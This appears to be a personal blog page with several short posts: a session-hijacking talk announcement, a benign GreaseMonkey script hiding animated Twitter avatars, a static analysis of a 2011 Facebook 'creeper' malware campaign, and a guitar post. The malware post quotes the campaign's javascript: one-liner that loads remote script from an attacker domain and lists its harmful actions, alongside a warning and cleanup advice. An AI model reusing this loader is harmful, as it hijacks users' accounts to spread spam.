On February the 4th I had a small presentation at Thessaloniki Tech Talk Sessions, on hijacking web sessions and injecting code at the lower layers of a local area network. Here you can find the slides and a little paper I wrote on the topic:
Bad Decisions 101: Animated Avatars On Twitter
While I was browsing today my timeline, I noticed some re-tweets of people who had annoyingly blinky avatars. I guess Twitter missed the old days, when browsing the web could give you an epileptic seizure. Since people tend to get excited with stupid ideas, I took the time to write a little GreaseMonkey script for Twitter, which substitutes GIF avatars with the Twitter’s default avatar (an egg or something). So now when the blinky pink “Hello, Kitty” apocalypse comes, I’ll be prepared.
You can grab the script from here.
/*
A little GreaseMonkey script for Twitter, which replaces GIF avatars
with the Twitter's default avatar in your timeline.
Karagasidis Dimitris, http://gatoni.gr
*/
// ==UserScript==
// @nameΒ Β Β Β Β Β Β Β Β Twitter GIF Avatar Blocker
// @namespaceΒ Β Β Β http://gatoni.gr
// @descriptionΒ Β A script which substitutes GIF avatars with the Twitter's default avatar
// @includeΒ Β Β Β Β Β http://twitter.com/*
// ==/UserScript==
function eliminate_gifs() {
var avatars = document.getElementsByTagName("img");
for ( var i in avatars ) {
// Check if the image is an avatar in the timeline
if ( avatars[i].className == "user-profile-link" || avatars[i].className == "photo fn" ) {
// Substitute the animated avatar with the Twitter's default avatar
if ( avatars[i].src.substr(-3).toLowerCase() == "gif" ) {
avatars[i].src = "http://a1.twimg.com/sticky/default_profile_images/default_profile_0_normal.png";
};
};
};
};
eliminate_gifs();
setInterval( eliminate_gifs, 3000 );
Static analysis of fbcreeper/procreeper/profilechecker/thefbcreeper Facebook malware
Spent the day de-obfuscating and analyzing the code of a malware I found on the wall of one of my contacts. It took me quite a few hours, since I de-obfuscated the code manually in a text-editor. At least now I can build a descent code obfuscator on my own.Β :p
You can read the de-obfuscated and fully documented code here.
This is the URLs distributing the malware:
- http://fbcreeper.info/
- http://procreeper.info/
- http://profilechecker.info/
- http://thefbcreeper.info/
This is what this malware does:
- Posts links on victim’s wall, which advertise the malware
- Posts links to victim’s contacts’ walls, which advertise the malware
- Posts links to pages created or administered by victim, which advertise
the malware - Adds users with emails lethaburbach890@yahoo.com and chunfeezellwytm@hotmail.com as administrators to the pages created by the victim.
- Sends private messages, advertising the malware
- “Likes” pages “DJ-Emphatic” and “OH Whutt” with victim’s account
- Invites all contacts to an event (which seems to be removed now)
- Sends user to http://fbviews.org/result.php, where the user is asked to do some “anti-spam verification tests” before he can view the results. Of course there are no results, and the malware developers earn money from bringing traffic to the sites mentined there.
As of now (22nd February 2011, 23:40 GMT+2), somewhere between 11,000 and 20,000 accounts are infected.
The malware is injected through a javascript code snippet:
javascript: (a = (d = document).createElement("script")).src = "http://fbcreeper.info/StalkerTools.fb";void(d.body.appendChild(a))
Do NOT inject and execute unknown code in your browser address bar. If you happened to use this application/malware, check your pages’ administrators, log-out from your Facebook account, clear browsing history and remove any links left on your wall and your pages.
Some lazy afternoon jamming…
Going through some lazy days, not working on anything in particular. Waiting for my exam period to end. Spent the day jamming on my guitar, and decided to record some parts of it. So this is the result. 
